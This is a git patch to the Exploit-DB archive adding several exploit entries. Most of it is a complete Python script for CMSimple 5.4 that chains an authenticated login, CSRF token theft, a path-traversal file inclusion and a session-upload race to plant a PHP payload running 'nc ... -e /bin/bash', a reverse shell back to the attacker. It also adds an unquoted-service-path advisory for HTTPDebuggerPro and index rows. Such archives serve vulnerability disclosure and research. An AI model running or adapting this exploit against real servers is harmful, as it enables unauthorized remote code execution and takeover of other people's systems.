From 268efc5072a142b6445393377df3b04e4f18162d Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 25 Nov 2021 05:02:12 +0000
Subject: [PATCH] DB: 2021-11-25

3 changes to exploits/shellcodes

HTTPDebuggerPro 9.11 - Unquoted Service Path

CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated)
---
 exploits/php/webapps/50129.py    |  1 +
 exploits/php/webapps/50547.py    | 87 ++++++++++++++++++++++++++++++++
 exploits/windows/local/50545.txt | 18 +++++++
 files_exploits.csv               |  2 +
 4 files changed, 108 insertions(+)
 create mode 100755 exploits/php/webapps/50547.py
 create mode 100644 exploits/windows/local/50545.txt

diff --git a/exploits/php/webapps/50129.py b/exploits/php/webapps/50129.py
index ac224d9b0..3c029a43b 100755
--- a/exploits/php/webapps/50129.py
+++ b/exploits/php/webapps/50129.py
@@ -5,6 +5,7 @@
 # Software Link: https://downloads.wordpress.org/plugin/wordpress-popular-posts.5.3.2.zip
 # Version: 5.3.2 or below
 # Tested on: Debian 10, WordPress 5.7.2, PHP version 7.3.27
+# CVE: CVE-2021-42362
 # Reference: https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/
 # Notes: It's required that the Popular Posts widget is active (ie. in the footer section) and gd extension for PHP is
 # enabled (otherwise WPP can't generate thumbnails). Also, the authenticated user must have "Contributor" role or above.
diff --git a/exploits/php/webapps/50547.py b/exploits/php/webapps/50547.py
new file mode 100755
index 000000000..f347ae14a
--- /dev/null
+++ b/exploits/php/webapps/50547.py
@@ -0,0 +1,87 @@
+# Exploit Title: CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated)
+# Date: 11/15/2021
+# Exploit Author: S1lv3r
+# Vendor Homepage: https://www.cmsimple.org/en/
+# Software Link: https://www.cmsimple.org/en/
+# Version:  CMSimple 5.4
+# Tested on: CMSimple 5.4
+
+# writeup:
+# https://github.com/iiSiLvEr/CMSimple5.4-Vulnerabilities
+
+#!/usr/bin/python3
+import requests
+import threading
+import datetime
+import sys
+from bs4 import BeautifulSoup
+
+
+x = datetime.datetime.now()
+addSeconds = datetime.timedelta(0, 10)
+Time = x + addSeconds
+
+proxies = {"http": "http://127.0.0.1:8080","https": "https://127.0.0.1:8080",}
+def Login():
+	try:
+		global Time
+		s = requests.Session()
+		headers= {"Content-Type": "application/x-www-form-urlencoded"}
+
+		data = f'login=true&selected=Welcome_to_CMSimple_5&User={User}&passwd={Password}&submit=Login'
+
+		response = s.post(RHOST, data=data, headers=headers, verify=False)#, proxies=proxies
+		if response.cookies['passwd']:
+			print("(+) Sucessfully Logged In With " + User + ":" + Password)
+
+			cookies = response.cookies
+			params = (('file', 'config'),('action', 'array'),)
+			response = s.get(RHOST ,cookies=cookies ,params=params,verify=False)
+			soup = BeautifulSoup(response.text, 'lxml')
+			CsrfValue = soup.find('input',attrs = {'name':'csrf_token'})['value']
+			print("(+) Get CSRF Token  : [ " + CsrfValue + " ]")
+			data = f'csrf_token={CsrfValue}&functions_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fsess_S1lv3r&form=array&file=config&action=save'
+			response = s.post(RHOST, headers=headers, cookies=cookies, data=data, verify=False)
+			print("(+) Changing Functions file Done  ")
+			print("(+) Check Your nc listner on " + LPORT)
+	except Exception as error:
+		print("Error, Exiting;( ")
+		print(error)
+		pass
+def fuzz():
+	while True:
+		try:
+			sessionName = "S1lv3r"
+			cookies = {'PHPSESSID': sessionName}
+			files = {'PHP_SESSION_UPLOAD_PROGRESS':(None,
+				'<?php passthru("nc '+ LHOST +' '+ LPORT + ' -e /bin/bash");?>'),
+				'file': ('Anything', 'S1lv3r'*100, 'application/octet-stream')}
+			x = requests.post(RHOST, files=files, cookies=cookies, verify=False)#, proxies=proxies
+		except Exception as error:
+			print(error)
+			exit()
+def main():
+	print("\n(+) CMSimple LFI to RCE \n")
+	Login()
+	threads = []
+	for _ in range(20):
+		t = threading.Thread(target=fuzz)
+		t.start()
+		threads.append(t)
+	for thread in threads:
+		thread.join
+
+if __name__ == "__main__":
+
+    if len(sys.argv) <= 5:
+        print("\n(-) Usage: {} <RHOST> <LHOST> <LPORT> <USER> <PASS>".format(sys.argv[0]))
+        print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0]))
+        print("\n(=) SiLvEr \n")
+        exit()
+    else:
+    	RHOST = sys.argv[1]
+    	LHOST = sys.argv[2]
+    	LPORT = sys.argv[3]
+    	User =  sys.argv[4]
+    	Password = sys.argv[5]
+    	main()
\ No newline at end of file
diff --git a/exploits/windows/local/50545.txt b/exploits/windows/local/50545.txt
new file mode 100644
index 000000000..aed9b651a
--- /dev/null
+++ b/exploits/windows/local/50545.txt
@@ -0,0 +1,18 @@
+# Exploit Title: HTTPDebuggerPro 9.11 - Unquoted Service Path
+# Exploit Author: Aryan Chehreghani
+# Date: 23/11/2021
+# Vendor Homepage: https://www.httpdebugger.com
+# Software Link: https://www.httpdebugger.com/download.html
+# Version: 9.11
+# Tested on: Windows 10 x64
+
+SERVICE_NAME: HTTPDebuggerPro
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : "C:\Program Files (x86)\HTTPDebuggerPro\HTTPDebuggerSvc.exe"
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : HTTP Debugger Pro
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 608068c5d..0de94ec98 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11420,6 +11420,7 @@ id,file,description,date,author,type,platform,port
 50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",1970-01-01,LIWEI,local,multiple,
 50517,exploits/windows/local/50517.txt,"Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation",1970-01-01,"Marcio Mendes",local,windows,
 50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",1970-01-01,"Ujas Dhami",local,linux,
+50545,exploits/windows/local/50545.txt,"HTTPDebuggerPro 9.11 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44638,3 +44639,4 @@ id,file,description,date,author,type,platform,port
 50542,exploits/multiple/webapps/50542.txt,"Webrun 3.6.0.42 - 'P_0' SQL Injection",1970-01-01,"Vinicius Alves",webapps,multiple,
 50543,exploits/php/webapps/50543.txt,"Bus Pass Management System 1.0 - 'Search' SQL injection",1970-01-01,"Abhijeet Singh",webapps,php,
 50544,exploits/multiple/webapps/50544.txt,"FLEX 1085 Web 1.6.0 - HTML Injection",1970-01-01,"Mr Empy",webapps,multiple,
+50547,exploits/php/webapps/50547.py,"CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated)",1970-01-01,S1lv3r,webapps,php,